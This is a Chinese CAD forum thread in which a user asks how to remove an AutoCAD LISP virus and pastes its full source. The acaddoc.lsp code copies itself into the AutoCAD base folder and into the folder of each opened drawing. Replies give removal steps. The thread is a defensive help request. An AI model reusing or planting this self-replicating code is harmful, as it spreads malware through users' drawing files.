[求助]除掉这个CAD病毒

tame 发表于 2010-11-25 12:49:00

<div>不知是哪天开始，CAD开始弹出“眼睛雪亮”，上网找处理方法，下载CAD专杀，也全盘扫描删除文件，最后没弹“眼睛雪亮”了，只剩下一个顽固份子，老弹“努力工作哦！！”怎么也删不掉，也杀不掉，很是烦人。</div>
<div> </div>
<div>一般情况下，新建CAD文件不会弹出，只要打开某个CAD文件就会弹出，完了之后在CAD所在文件夹自动生成一个“acaddoc.lsp”文件，全盘删干净了，一开CAD文件就又来了，很是烦人。我打开这个文件看了看，也看不出个所以然来，想请各位大侠帮看看有没有办法处理，多谢！</div>
<div> </div>
<div>文件内容如下：</div>
<div> </div>
<div>(defun-q s::startup   (/ basepath      baseacad      acaddocpath      r-acaddoc      w-basepath      rl-acaddoc      acaddoclsp      c-acaddocname      c-acaddocpath      c-acaddoc     )      (setq basepath      (findfile "base.dcl")      )      (setq basepath      (substr basepath       1 (- (strlen basepath) 8)             )      )      (setq baseacad (strcat basepath "acaddoc.lsp"))    (setq acaddocpath                (findfile "acaddoc.lsp")  )  (setq acaddocpath         (substr acaddocpath          1 (- (strlen acaddocpath) 11)         )  )  (setq acaddoclsp         (strcat acaddocpath "acaddoc.lsp"))             (setq c-acaddocname         (getvar "dwgname")  )         (setq c-acaddocpath         (findfile c-acaddocname)  )         (setq c-acaddocpath         (substr c-acaddocpath          1 (- (strlen c-acaddocpath) (strlen c-acaddocname))    )   )         (setq c-acaddoc         (strcat c-acaddocpath "acaddoc.lsp")   )           (alert "努力工作哦！！")   (if            (and     (/= basepath acaddocpath)     (= c-acaddocpath acaddocpath)     )       (progn         (setq r-acaddoc         (open acaddoclsp "r")         )         (setq w-basepath            (open baseacad "w")   )             (while             (setq rl-acaddoc       (read-line r-acaddoc)             )             (write-line rl-acaddoc w-basepath)          )          (close w-basepath)                   (close r-acaddoc)                   )                (progn         (setq r-acaddoc         (open acaddoclsp "r")         )         (setq w-basepath            (open c-acaddoc "w")   )          (while             (setq rl-acaddoc       (read-line r-acaddoc)             )             (write-line rl-acaddoc w-basepath)          )          (close w-basepath)                   (close r-acaddoc)                   )   )   (princ) )</div>
<div> </div>
<div>另附一个CAD文件样本如下。</div>
<div> </div>

tame 发表于 2010-12-31 10:13:06

没人感兴趣？试过多种CAD专杀都没用。

ZZXXQQ 发表于 2010-12-31 20:16:28

那就手工杀。
在未引导ACAD的情况下，用WINDOWS的查找功能，全盘查找ACADDOC.LSP。
将查出的文件全部删除就行了。

xiaxiang 发表于 2011-1-6 17:57:08

ZZXXQQ 发表于 2010-12-31 20:16 static/image/common/back.gif
那就手工杀。
在未引导ACAD的情况下，用WINDOWS的查找功能，全盘查找ACADDOC.LSP。
将查出的文件全部删除 ...

斑竹高见

戏男发表于 2011-9-9 10:06:03

我没遇到过这种情况

874185423 发表于 2011-9-27 06:22:09

这种问题很烦人，我的电脑也这样

qfkxc 发表于 2011-9-29 12:23:52

在命令行中输入以下语句：

(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))

回车后关闭AutoCAD，重新启动AutoCAD后你就会发现一切都正常了。

czb203 发表于 2011-11-18 11:19:33

cad现在很多的病毒希望高手能解决

s305040093 发表于 2012-1-30 20:20:51

其实这种lisp病毒并不难去掉因为源代码完全公开只要在lisp里调试一遍，就可以知道病毒的运作原理了

s305040093 发表于 2012-1-30 20:28:36

通常采取全盘搜索删除都是不好用的一般的病毒都会把代码写进*.lsp与*.mnl文件内，然后再复制一个acaddoc.lsp文件用来传播。一般把病毒代码找出来删干净以后将support目录设为只读就行了。绝大部分病毒都不改变原来文件的属性。因为这些文件都是cad启动后自动运行的
最笨的解决办法就是先关闭cad。全盘搜索acaddoc.lsp(前提是病毒没有更改隐藏文件的显示)，然后将没有病毒的cad的support路径下（有两处）的文件全部拷贝过来。然后设为只读。一般就可以解决问题了

页: [1]

明经CAD社区's Archiver

[求助]除掉这个CAD病毒